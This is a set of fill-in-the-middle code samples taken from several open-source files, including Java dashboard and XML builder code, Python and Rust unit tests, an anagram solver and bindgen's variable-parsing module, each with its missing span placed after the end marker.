if (detailed) { obj.put("created", itemValue.getCreated()); obj.put("modified", itemValue.getModified()); obj.put("item", itemBuilder.getJSONObject(true)); } return obj; } public Element getElement(Document document) { return getElement(document, true); } public Element getElement(Document document, boolean detailed) { Element element = document.createElement("ItemValue"); element.setAttribute("uid", itemValue.getUid()); element.appendChild(XMLUtils.getElement(document, "Path", itemValue.getPath())); element.appendChild(XMLUtils.getElement(document, "Name", itemValue.getName())); element.appendChild(XMLUtils.getElement(document, "Value", itemValue.getValueAsString())); if (NumberValue.class.isAssignableFrom(itemValue.getClass())) { NumberValue numberValue = (NumberValue) itemValue; element.appendChild(XMLUtils.getElement(document, "Unit", numberValue.getUnit().toString())); element.appendChild(XMLUtils.getElement(document, "PerUnit", numberValue.getPerUnit().toString())); } else { element.appendChild(XMLUtils.getElement(document, "Unit", "")); element.appendChild(XMLUtils.getElement(document, "PerUnit", "")); } element.appendChild(XMLUtils.getElement(document, "StartDate", StartEndDate.getLocalStartEndDate(itemService.getStartDate(itemValue), TimeZoneHolder.getTimeZone()).toString())); element.appendChild(itemValue.getItemValueDefinition().getElement(document, false)); if (detailed) { element.setAttribute("Created", itemValue.getCreated().toString()); element.setAttribute("Modified", itemValue.getModified().toString()); element.appendChild(itemBuilder.getIdentityElement(document)); } return element; } public JSONObject getIdentityJSONObject() throws JSONException { JSONObject obj = new JSONObject(); obj.put("uid", itemValue.getUid()); obj.put("path", itemValue.getPath()); return obj; } public Element getIdentityElement(Document document) { return XMLUtils.getIdentityElement(document, "ItemValue", itemValue); } }<|fim▁end|>
public class ItemValueBuilder implements Builder {
<|file_name|>nsiqcppstyle_unittestbase.py<|end_file_name|><|fim▁begin|># Copyright (c) 2009 NHN Inc. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of NHN Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import nsiqcppstyle_checker import unittest import nsiqcppstyle_rulemanager<|fim▁hole|> errors = [] def AddError(err): errors.append(err) def CheckErrorContent(msg): for err in errors : if err[1] == msg : return True return False def MockError(token, category, message): AddError((token, category, message)) print token, category, message class nct(unittest.TestCase): def setUp(self): nsiqcppstyle_rulemanager.ruleManager.ResetRules() nsiqcppstyle_rulemanager.ruleManager.ResetRegisteredRules() nsiqcppstyle_state._nsiqcppstyle_state.verbose = True nsiqcppstyle_reporter.Error = MockError self.setUpRule() global errors errors = [] def Analyze(self, filename, data): nsiqcppstyle_checker.ProcessFile(nsiqcppstyle_rulemanager.ruleManager, filename, data)<|fim▁end|>
import nsiqcppstyle_reporter import nsiqcppstyle_state
<|file_name|>cmake_unittest.py<|end_file_name|><|fim▁begin|># Copyright (C) 2012 Intel Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for cmake.py.""" import unittest2 as unittest from cmake import CMakeChecker class CMakeCheckerTest(unittest.TestCase): """Tests CMakeChecker class.""" def test_init(self): """Test __init__() method.""" def _mock_handle_style_error(self): pass checker = CMakeChecker("foo.cmake", _mock_handle_style_error) self.assertEqual(checker._handle_style_error, _mock_handle_style_error) def test_check(self): """Test check() method.""" errors = [] def _mock_handle_style_error(line_number, category, confidence, message): error = (line_number, category, confidence, message) errors.append(error) checker = CMakeChecker("foo.cmake", _mock_handle_style_error) lines = [ '# This file is sample input for cmake_unittest.py and includes below problems:\n', 'IF ()', '\tmessage("Error line with Tab")\n', ' message("Error line with endding spaces") \n', ' message( "Error line with space after (")\n', ' message("Error line with space before (" )\n', ' MESSAGE("Error line with upper case non-condtional command")\n', ' MESSage("Error line with upper case non-condtional command")\n', ' message("correct message line")\n', 'ENDif ()\n', '\n', 'if()\n', 'endif ()\n', '\n', 'macro ()\n', 'ENDMacro()\n', '\n', 'function ()\n', 'endfunction()\n', '\n', 'set(name a)\n', 'set(name a b c)\n', 'set(name a\n', 'b)\n', 'set(name', 'abc\n', ')\n', 'list(APPEND name a)\n', 'list(APPEND name\n', 'a\n', 'a\n', ')\n', 'list(APPEND name\n', 'b\n', 'a\n', '\n', 'c/a.a\n', '\n', 'c/b/a.a\n', '${aVariable}\n', '\n', 'c/c.c\n', '\n', 'c/b/a.a\n', ')\n', 'list(REMOVE_ITEM name a)\n', 'list(REMOVE_ITEM name\n', 'a\n', '\n', 'b\n', ')\n', 'list(REMOVE_ITEM name\n', 'a/a.a\n', 'a/b.b\n', 'b/a.a\n', '\n', '\n', 'c/a.a\n', ')\n', ] checker.check(lines) self.maxDiff = None self.assertEqual(errors, [ (3, 'whitespace/tab', 5, 'Line contains tab character.'), (2, 'command/lowercase', 5, 'Use lowercase command "if"'), (4, 'whitespace/trailing', 5, 'No trailing spaces'), (5, 'whitespace/parentheses', 5, 'No space after "("'), (6, 'whitespace/parentheses', 5, 'No space before ")"'), (7, 'command/lowercase', 5, 'Use lowercase command "message"'), (8, 'command/lowercase', 5, 'Use lowercase command "message"'), (10, 'command/lowercase', 5, 'Use lowercase command "endif"'), (12, 'whitespace/parentheses', 5, 'One space between command "if" and its parentheses, should be "if ("'), (15, 'whitespace/parentheses', 5, 'No space between command "macro" and its parentheses, should be "macro("'), (16, 'command/lowercase', 5, 'Use lowercase command "endmacro"'), (18, 'whitespace/parentheses', 5, 'No space between command "function" and its parentheses, should be "function("'), (23, 'list/parentheses', 5, 'First listitem "a" should be in a new line.'), (24, 'list/parentheses', 5, 'The parentheses after the last listitem "b" should be in a new line.'), (31, 'list/duplicate', 5, 'The item "a" should be added only once to the list.'), (35, 'list/order', 5, 'Alphabetical sorting problem. "a" should be before "b".'), (41, 'list/order', 5, 'Alphabetical sorting problem. "c/c.c" should be before "c/b/a.a".'), (49, 'list/emptyline', 5, 'There should be no empty line between "a" and "b".'), (54, 'list/emptyline', 5, 'There should be exactly one empty line instead of 0 between "a/b.b" and "b/a.a".'), (57, 'list/emptyline', 5, 'There should be exactly one empty line instead of 2 between "b/a.a" and "c/a.a".'),<|fim▁hole|><|fim▁end|>
])
<|file_name|>anagram_solver.py<|end_file_name|><|fim▁begin|>#!/usr/local/bin/python3.5 import itertools import sys from .stuff import word_set<|fim▁hole|> def find_possible(lst): """ Return all possible combinations of letters in lst @type lst: [str] @rtype: [str] """ returned_list = [] for i in range(0, len(lst) + 1): for subset in itertools.permutations(lst, i): possible = '' for letter in subset: possible += letter if len(possible) == len(lst): # itertools.permutations returns smaller lists returned_list.append(possible) return returned_list def return_words(lst, word_set): """ Return combinations in that are words in word_set @type lst: [str] @type word_set: set(str) @rtype: [str] """ returned_list = [] for word in lst: if word in word_set or word.capitalize() in word_set: # Some words are capitalized in the word_set returned_list.append(word) return returned_list def main(): """ Main function to run the program """ anagram_lst = [] anagram = sys.argv[1] for char in anagram: anagram_lst.append(char) possible_words = find_possible(anagram_lst) actual_words = return_words(possible_words, word_set) print('Solutions:') if len(actual_words) == 0: print('None found') else: for item in set(actual_words): # Running through in set form prevents duplicates print(item)<|fim▁end|>
__version__ = "1.1.0"
<|file_name|>DashboardManagerImpl.java<|end_file_name|><|fim▁begin|>/* * NOTE: This copyright does *not* cover user programs that use HQ * program services by normal system calls through the application * program interfaces provided as part of the Hyperic Plug-in Development * Kit or the Hyperic Client Development Kit - this is merely considered * normal use of the program, and does *not* fall under the heading of * "derived work". * * Copyright (C) [2004-2009], Hyperic, Inc. * This file is part of HQ. * * HQ is free software; you can redistribute it and/or modify * it under the terms version 2 of the GNU General Public License as * published by the Free Software Foundation. This program is distributed * in the hope that it will be useful, but WITHOUT ANY WARRANTY; without * even the implied warranty of MERCHANTABILITY or FITNESS FOR A * PARTICULAR PURPOSE. See the GNU General Public License for more * details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * USA. */ package org.hyperic.hq.ui.server.session; import java.rmi.RemoteException; import java.util.ArrayList; import java.util.Collection; import java.util.List; import javax.security.auth.login.LoginException; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.hyperic.hq.appdef.shared.AppdefEntityID; import org.hyperic.hq.auth.shared.SessionManager; import org.hyperic.hq.auth.shared.SessionNotFoundException; import org.hyperic.hq.auth.shared.SessionTimeoutException; import org.hyperic.hq.authz.server.session.AuthzApplicationEvent; import org.hyperic.hq.authz.server.session.AuthzSubject; import org.hyperic.hq.authz.server.session.Role; import org.hyperic.hq.authz.server.session.RoleCreatedEvent; import org.hyperic.hq.authz.server.session.RoleDeleteRequestedEvent; import org.hyperic.hq.authz.server.session.RoleRemoveFromSubjectRequestedEvent; import org.hyperic.hq.authz.server.session.SubjectDeleteRequestedEvent; import org.hyperic.hq.authz.shared.AuthzConstants; import org.hyperic.hq.authz.shared.AuthzSubjectManager; import org.hyperic.hq.authz.shared.PermissionException; import org.hyperic.hq.authz.shared.PermissionManager; import org.hyperic.hq.authz.shared.PermissionManagerFactory; import org.hyperic.hq.bizapp.shared.AuthzBoss; import org.hyperic.hq.common.server.session.Crispo; import org.hyperic.hq.common.server.session.CrispoOption; import org.hyperic.hq.common.shared.CrispoManager; import org.hyperic.hq.ui.Constants; import org.hyperic.hq.ui.Dashboard; import org.hyperic.hq.ui.WebUser; import org.hyperic.hq.ui.shared.DashboardManager; import org.hyperic.util.StringUtil; import org.hyperic.util.config.ConfigResponse; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.context.ApplicationListener; import org.springframework.stereotype.Service; import org.springframework.transaction.annotation.Transactional; /** */ @Service @Transactional public class DashboardManagerImpl implements DashboardManager, ApplicationListener<AuthzApplicationEvent> { private Log log = LogFactory.getLog(DashboardManagerImpl.class); protected SessionManager sessionManager = SessionManager.getInstance(); private DashboardConfigDAO dashDao; private CrispoManager crispoManager; private AuthzSubjectManager authzSubjectManager; @Autowired public DashboardManagerImpl(DashboardConfigDAO dashDao, CrispoManager crispoManager, AuthzSubjectManager authzSubjectManager) { this.dashDao = dashDao; this.crispoManager = crispoManager; this.authzSubjectManager = authzSubjectManager; } /** */ @Transactional(readOnly = true) public UserDashboardConfig getUserDashboard(AuthzSubject me, AuthzSubject user) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); if (!me.equals(user) && !permMan.hasAdminPermission(me.getId())) { throw new PermissionException("You are unauthorized to see this " + "dashboard"); } return dashDao.findDashboard(user); } /** */ @Transactional(readOnly = true) public RoleDashboardConfig getRoleDashboard(AuthzSubject me, Role r) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); permMan.check(me.getId(), r.getResource().getResourceType(), r.getId(), AuthzConstants.roleOpModifyRole); return dashDao.findDashboard(r); } private ConfigResponse getDefaultConfig() { return new ConfigResponse(); } /** */ public UserDashboardConfig createUserDashboard(AuthzSubject me, AuthzSubject user, String name) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); if (!me.equals(user) && !permMan.hasAdminPermission(me.getId())) { throw new PermissionException("You are unauthorized to create " + "this dashboard"); } Crispo cfg = crispoManager.create(getDefaultConfig()); UserDashboardConfig dash = new UserDashboardConfig(user, name, cfg); dashDao.save(dash); return dash; } /** */ public RoleDashboardConfig createRoleDashboard(AuthzSubject me, Role r, String name) throws PermissionException { PermissionManager permMan = PermissionManagerFactory.getInstance(); permMan.check(me.getId(), r.getResource().getResourceType(), r.getId(), AuthzConstants.roleOpModifyRole); Crispo cfg = crispoManager.create(getDefaultConfig()); RoleDashboardConfig dash = new RoleDashboardConfig(r, name, cfg); dashDao.save(dash); return dash; } /** * Reconfigure a user's dashboard */ public void configureDashboard(AuthzSubject me, DashboardConfig cfg, ConfigResponse newCfg) throws PermissionException { if (!isEditable(me, cfg)) { throw new PermissionException("You are unauthorized to modify " + "this dashboard"); } crispoManager.update(cfg.getCrispo(), newCfg); } /** */ public void renameDashboard(AuthzSubject me, DashboardConfig cfg, String name) throws PermissionException { if (!isEditable(me, cfg)) { throw new PermissionException("You are unauthorized to modify " + "this dashboard"); } cfg.setName(name); } /** * Determine if a dashboard is editable by the passed user */ @Transactional(readOnly = true) public boolean isEditable(AuthzSubject me, DashboardConfig dash) { PermissionManager permMan = PermissionManagerFactory.getInstance(); if (permMan.hasAdminPermission(me.getId())) return true; return dash.isEditable(me); } /** */ @Transactional(readOnly = true) public Collection<DashboardConfig> getDashboards(AuthzSubject me) throws PermissionException { Collection<DashboardConfig> res = new ArrayList<DashboardConfig>(); PermissionManager permMan = PermissionManagerFactory.getInstance(); if (permMan.hasGuestRole() && permMan.hasAdminPermission(me.getId())) { res.addAll(dashDao.findAllRoleDashboards()); res.add(getUserDashboard(me, me)); return res; } UserDashboardConfig cfg = getUserDashboard(me, me); if (cfg != null) res.add(cfg); if (permMan.hasGuestRole()) res.addAll(dashDao.findRolesFor(me)); return res; } /** * Update dashboard and user configs to account for resource deletion * * @param ids An array of ID's of removed resources */ public void handleResourceDelete(AppdefEntityID[] ids) { for (int i = 0; i < ids.length; i++) { String appdefKey = ids[i].getAppdefKey(); List<CrispoOption> copts = crispoManager.findOptionByValue(appdefKey); for (CrispoOption o : copts) { String val = o.getValue(); String newVal = removeResource(val, appdefKey); if (!val.equals(newVal)) { crispoManager.updateOption(o, newVal); log.debug("Update option key=" + o.getKey() + " old =" + val + " new =" + newVal); } } } } /** */<|fim▁hole|> try { AuthzSubject me = authzSubjectManager.findSubjectByName(user); preferences = getUserDashboard(me, me).getConfig(); } catch (Exception e) { throw new LoginException("Username has no preferences"); } // Let's make sure that the rss auth token matches String prefToken = preferences.getValue(Constants.RSS_TOKEN); if (token == null || !token.equals(prefToken)) throw new LoginException("Username and Auth token do not match"); return preferences; } private String removeResource(String val, String resource) { val = StringUtil.remove(val, resource); val = StringUtil.replace(val, Constants.EMPTY_DELIMITER, Constants.DASHBOARD_DELIMITER); return val; } public void onApplicationEvent(AuthzApplicationEvent event) { if(event instanceof SubjectDeleteRequestedEvent) { dashDao.handleSubjectRemoval(((SubjectDeleteRequestedEvent)event).getSubject()); }else if(event instanceof RoleDeleteRequestedEvent) { roleRemoved(((RoleDeleteRequestedEvent)event).getRole()); }else if(event instanceof RoleCreatedEvent) { roleCreated(((RoleCreatedEvent)event).getRole()); }else if(event instanceof RoleRemoveFromSubjectRequestedEvent) { roleRemovedFromSubject(((RoleRemoveFromSubjectRequestedEvent)event).getRole(), ((RoleRemoveFromSubjectRequestedEvent)event).getSubject()); } } private void roleRemoved(Role role) { RoleDashboardConfig cfg = dashDao.findDashboard(role); if (cfg == null) { return; } List<CrispoOption> opts = crispoManager.findOptionByKey(Constants.DEFAULT_DASHBOARD_ID); for (CrispoOption opt : opts) { if (Integer.valueOf(opt.getValue()).equals(cfg.getId())) { crispoManager.updateOption(opt, null); } } dashDao.handleRoleRemoval(role); } private void roleCreated(Role role) { Crispo cfg = crispoManager.create(getDefaultConfig()); RoleDashboardConfig dash = new RoleDashboardConfig(role, role.getName() + " Role Dashboard", cfg); dashDao.save(dash); } private void roleRemovedFromSubject(Role r, AuthzSubject from) { RoleDashboardConfig cfg = dashDao.findDashboard(r); Crispo c = from.getPrefs(); if (c != null) { for (CrispoOption opt : c.getOptions()) { if (opt.getKey().equals(Constants.DEFAULT_DASHBOARD_ID) && Integer.valueOf(opt.getValue()).equals(cfg.getId())) { crispoManager.updateOption(opt, null); break; } } } } @Transactional(readOnly = true) public List<DashboardConfig> findEditableDashboardConfigs(WebUser user, AuthzBoss boss) throws SessionNotFoundException, SessionTimeoutException, PermissionException, RemoteException { AuthzSubject me = boss.findSubjectById(user.getSessionId(), user.getSubject().getId()); Collection<DashboardConfig> dashboardCollection = getDashboards(me); List<DashboardConfig> editableDashboardConfigs = new ArrayList<DashboardConfig>(); for (DashboardConfig config : dashboardCollection) { if (isEditable(me, config)) { editableDashboardConfigs.add(config); } } return editableDashboardConfigs; } @Transactional(readOnly = true) public List<Dashboard> findEditableDashboards(WebUser user, AuthzBoss boss) throws SessionNotFoundException, SessionTimeoutException, PermissionException, RemoteException { List<DashboardConfig> dashboardConfigs = findEditableDashboardConfigs(user, boss); List<Dashboard> editableDashboards = new ArrayList<Dashboard>(); for (DashboardConfig config : dashboardConfigs) { Dashboard dashboard = new Dashboard(); dashboard.set_name(config.getName()); dashboard.setId(config.getId()); editableDashboards.add(dashboard); } return editableDashboards; } /** * Find a given dashboard by its id * @param id the id of the dashboard * @param user current user * @param boss the authzboss * @return the DashboardConfig of the corresponding DashboardId or null if * none */ @Transactional(readOnly = true) public DashboardConfig findDashboard(Integer id, WebUser user, AuthzBoss boss) { Collection<DashboardConfig> dashboardCollection; try { AuthzSubject me = boss.findSubjectById(user.getSessionId(), user.getSubject().getId()); dashboardCollection = getDashboards(me); } catch (Exception e) { return null; } for (DashboardConfig config : dashboardCollection) { if (config.getId().equals(id)) { return config; } } return null; } }<|fim▁end|>
@Transactional(readOnly = true) public ConfigResponse getRssUserPreferences(String user, String token) throws LoginException { ConfigResponse preferences;
<|file_name|>multiple-trait-bounds.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT.<|fim▁hole|>// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. fn f<T:Eq + Ord>(_: T) { } pub fn main() { f(3); }<|fim▁end|>
//
<|file_name|>test_db_backend.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import, unicode_literals import unittest from django.test import TestCase <|fim▁hole|>from .test_backends import BackendTests class TestDBBackend(BackendTests, TestCase): backend_path = 'wagtail.wagtailsearch.backends.db' @unittest.expectedFailure def test_callable_indexed_field(self): super(TestDBBackend, self).test_callable_indexed_field() @unittest.expectedFailure def test_update_index_command(self): super(TestDBBackend, self).test_update_index_command() def test_annotate_score(self): results = self.backend.search("Hello", models.SearchTest).annotate_score('_score') for result in results: # DB backend doesn't do scoring, so annotate_score should just add None self.assertIsNone(result._score)<|fim▁end|>
from wagtail.tests.search import models
<|file_name|>var.rs<|end_file_name|><|fim▁begin|>//! Intermediate representation of variables. use super::super::codegen::MacroTypeVariation; use super::context::{BindgenContext, TypeId}; use super::dot::DotAttributes; use super::function::cursor_mangling; use super::int::IntKind; use super::item::Item; use super::ty::{FloatKind, TypeKind}; use crate::callbacks::MacroParsingBehavior; use crate::clang; use crate::clang::ClangToken; use crate::parse::{ ClangItemParser, ClangSubItemParser, ParseError, ParseResult, }; use cexpr; use std::io; use std::num::Wrapping; /// The type for a constant variable. #[derive(Debug)] pub enum VarType { /// A boolean. Bool(bool), /// An integer. Int(i64), /// A floating point number. Float(f64), /// A character. Char(u8), /// A string, not necessarily well-formed utf-8. String(Vec<u8>), } /// A `Var` is our intermediate representation of a variable. #[derive(Debug)] pub struct Var { /// The name of the variable. name: String, /// The mangled name of the variable. mangled_name: Option<String>, /// The type of the variable. ty: TypeId, /// The value of the variable, that needs to be suitable for `ty`. val: Option<VarType>, /// Whether this variable is const. is_const: bool, } impl Var { /// Construct a new `Var`. pub fn new( name: String, mangled_name: Option<String>, ty: TypeId, val: Option<VarType>, is_const: bool, ) -> Var { assert!(!name.is_empty()); Var { name, mangled_name, ty, val, is_const, } } /// Is this variable `const` qualified? pub fn is_const(&self) -> bool { self.is_const } /// The value of this constant variable, if any. pub fn val(&self) -> Option<&VarType> { self.val.as_ref() } /// Get this variable's type. pub fn ty(&self) -> TypeId { self.ty } /// Get this variable's name. pub fn name(&self) -> &str { &self.name } /// Get this variable's mangled name. pub fn mangled_name(&self) -> Option<&str> { self.mangled_name.as_deref() } } impl DotAttributes for Var { fn dot_attributes<W>( &self, _ctx: &BindgenContext, out: &mut W, ) -> io::Result<()> where W: io::Write, { if self.is_const { writeln!(out, "<tr><td>const</td><td>true</td></tr>")?; } if let Some(ref mangled) = self.mangled_name { writeln!( out, "<tr><td>mangled name</td><td>{}</td></tr>", mangled )?; } Ok(()) } } fn default_macro_constant_type(ctx: &BindgenContext, value: i64) -> IntKind { if value < 0 || ctx.options().default_macro_constant_type == MacroTypeVariation::Signed { if value < i32::min_value() as i64 || value > i32::max_value() as i64 { IntKind::I64 } else if !ctx.options().fit_macro_constants || value < i16::min_value() as i64 || value > i16::max_value() as i64 { IntKind::I32 } else if value < i8::min_value() as i64 || value > i8::max_value() as i64 { IntKind::I16 } else { IntKind::I8 } } else if value > u32::max_value() as i64 { IntKind::U64 } else if !ctx.options().fit_macro_constants || value > u16::max_value() as i64 { IntKind::U32 } else if value > u8::max_value() as i64 { IntKind::U16 } else { IntKind::U8 } } /// Parses tokens from a CXCursor_MacroDefinition pointing into a function-like /// macro, and calls the func_macro callback. fn handle_function_macro( cursor: &clang::Cursor, callbacks: &dyn crate::callbacks::ParseCallbacks, ) { let is_closing_paren = |t: &ClangToken| { // Test cheap token kind before comparing exact spellings. t.kind == clang_sys::CXToken_Punctuation && t.spelling() == b")" }; let tokens: Vec<_> = cursor.tokens().iter().collect(); if let Some(boundary) = tokens.iter().position(is_closing_paren) { let mut spelled = tokens.iter().map(ClangToken::spelling); // Add 1, to convert index to length. let left = spelled.by_ref().take(boundary + 1); let left = left.collect::<Vec<_>>().concat(); if let Ok(left) = String::from_utf8(left) { let right: Vec<_> = spelled.collect(); callbacks.func_macro(&left, &right); } } } impl ClangSubItemParser for Var { fn parse( cursor: clang::Cursor, ctx: &mut BindgenContext, ) -> Result<ParseResult<Self>, ParseError> { use cexpr::expr::EvalResult; use cexpr::literal::CChar; use clang_sys::*; match cursor.kind() { CXCursor_MacroDefinition => { if let Some(callbacks) = ctx.parse_callbacks() { match callbacks.will_parse_macro(&cursor.spelling()) { MacroParsingBehavior::Ignore => { return Err(ParseError::Continue); } MacroParsingBehavior::Default => {} } if cursor.is_macro_function_like() { handle_function_macro(&cursor, callbacks); // We handled the macro, skip macro processing below. return Err(ParseError::Continue); } } let value = parse_macro(ctx, &cursor); let (id, value) = match value { Some(v) => v, None => return Err(ParseError::Continue), }; assert!(!id.is_empty(), "Empty macro name?"); let previously_defined = ctx.parsed_macro(&id); // NB: It's important to "note" the macro even if the result is // not an integer, otherwise we might loose other kind of // derived macros. ctx.note_parsed_macro(id.clone(), value.clone()); if previously_defined { let name = String::from_utf8(id).unwrap(); warn!("Duplicated macro definition: {}", name); return Err(ParseError::Continue); } // NOTE: Unwrapping, here and above, is safe, because the // identifier of a token comes straight from clang, and we // enforce utf8 there, so we should have already panicked at // this point. let name = String::from_utf8(id).unwrap(); let (type_kind, val) = match value { EvalResult::Invalid => return Err(ParseError::Continue), EvalResult::Float(f) => { (TypeKind::Float(FloatKind::Double), VarType::Float(f)) } EvalResult::Char(c) => { let c = match c { CChar::Char(c) => { assert_eq!(c.len_utf8(), 1); c as u8 } CChar::Raw(c) => { assert!(c <= ::std::u8::MAX as u64); c as u8 } }; (TypeKind::Int(IntKind::U8), VarType::Char(c)) } EvalResult::Str(val) => { let char_ty = Item::builtin_type( TypeKind::Int(IntKind::U8), true, ctx, ); if let Some(callbacks) = ctx.parse_callbacks() { callbacks.str_macro(&name, &val); } (TypeKind::Pointer(char_ty), VarType::String(val)) } EvalResult::Int(Wrapping(value)) => { let kind = ctx .parse_callbacks() .and_then(|c| c.int_macro(&name, value)) .unwrap_or_else(|| { default_macro_constant_type(ctx, value) }); (TypeKind::Int(kind), VarType::Int(value)) } }; let ty = Item::builtin_type(type_kind, true, ctx);<|fim▁hole|> Var::new(name, None, ty, Some(val), true), Some(cursor), )) } CXCursor_VarDecl => { let name = cursor.spelling(); if name.is_empty() { warn!("Empty constant name?"); return Err(ParseError::Continue); } let ty = cursor.cur_type(); // TODO(emilio): do we have to special-case constant arrays in // some other places? let is_const = ty.is_const() || (ty.kind() == CXType_ConstantArray && ty.elem_type() .map_or(false, |element| element.is_const())); let ty = match Item::from_ty(&ty, cursor, None, ctx) { Ok(ty) => ty, Err(e) => { assert_eq!( ty.kind(), CXType_Auto, "Couldn't resolve constant type, and it \ wasn't an nondeductible auto type!" ); return Err(e); } }; // Note: Ty might not be totally resolved yet, see // tests/headers/inner_const.hpp // // That's fine because in that case we know it's not a literal. let canonical_ty = ctx .safe_resolve_type(ty) .and_then(|t| t.safe_canonical_type(ctx)); let is_integer = canonical_ty.map_or(false, |t| t.is_integer()); let is_float = canonical_ty.map_or(false, |t| t.is_float()); // TODO: We could handle `char` more gracefully. // TODO: Strings, though the lookup is a bit more hard (we need // to look at the canonical type of the pointee too, and check // is char, u8, or i8 I guess). let value = if is_integer { let kind = match *canonical_ty.unwrap().kind() { TypeKind::Int(kind) => kind, _ => unreachable!(), }; let mut val = cursor.evaluate().and_then(|v| v.as_int()); if val.is_none() || !kind.signedness_matches(val.unwrap()) { let tu = ctx.translation_unit(); val = get_integer_literal_from_cursor(&cursor, tu); } val.map(|val| { if kind == IntKind::Bool { VarType::Bool(val != 0) } else { VarType::Int(val) } }) } else if is_float { cursor .evaluate() .and_then(|v| v.as_double()) .map(VarType::Float) } else { cursor .evaluate() .and_then(|v| v.as_literal_string()) .map(VarType::String) }; let mangling = cursor_mangling(ctx, &cursor); let var = Var::new(name, mangling, ty, value, is_const); Ok(ParseResult::New(var, Some(cursor))) } _ => { /* TODO */ Err(ParseError::Continue) } } } } /// Try and parse a macro using all the macros parsed until now. fn parse_macro( ctx: &BindgenContext, cursor: &clang::Cursor, ) -> Option<(Vec<u8>, cexpr::expr::EvalResult)> { use cexpr::expr; let cexpr_tokens = cursor.cexpr_tokens(); let parser = expr::IdentifierParser::new(ctx.parsed_macros()); match parser.macro_definition(&cexpr_tokens) { Ok((_, (id, val))) => Some((id.into(), val)), _ => None, } } fn parse_int_literal_tokens(cursor: &clang::Cursor) -> Option<i64> { use cexpr::expr; use cexpr::expr::EvalResult; let cexpr_tokens = cursor.cexpr_tokens(); // TODO(emilio): We can try to parse other kinds of literals. match expr::expr(&cexpr_tokens) { Ok((_, EvalResult::Int(Wrapping(val)))) => Some(val), _ => None, } } fn get_integer_literal_from_cursor( cursor: &clang::Cursor, unit: &clang::TranslationUnit, ) -> Option<i64> { use clang_sys::*; let mut value = None; cursor.visit(|c| { match c.kind() { CXCursor_IntegerLiteral | CXCursor_UnaryOperator => { value = parse_int_literal_tokens(&c); } CXCursor_UnexposedExpr => { value = get_integer_literal_from_cursor(&c, unit); } _ => (), } if value.is_some() { CXChildVisit_Break } else { CXChildVisit_Continue } }); value }<|fim▁end|>
Ok(ParseResult::New(
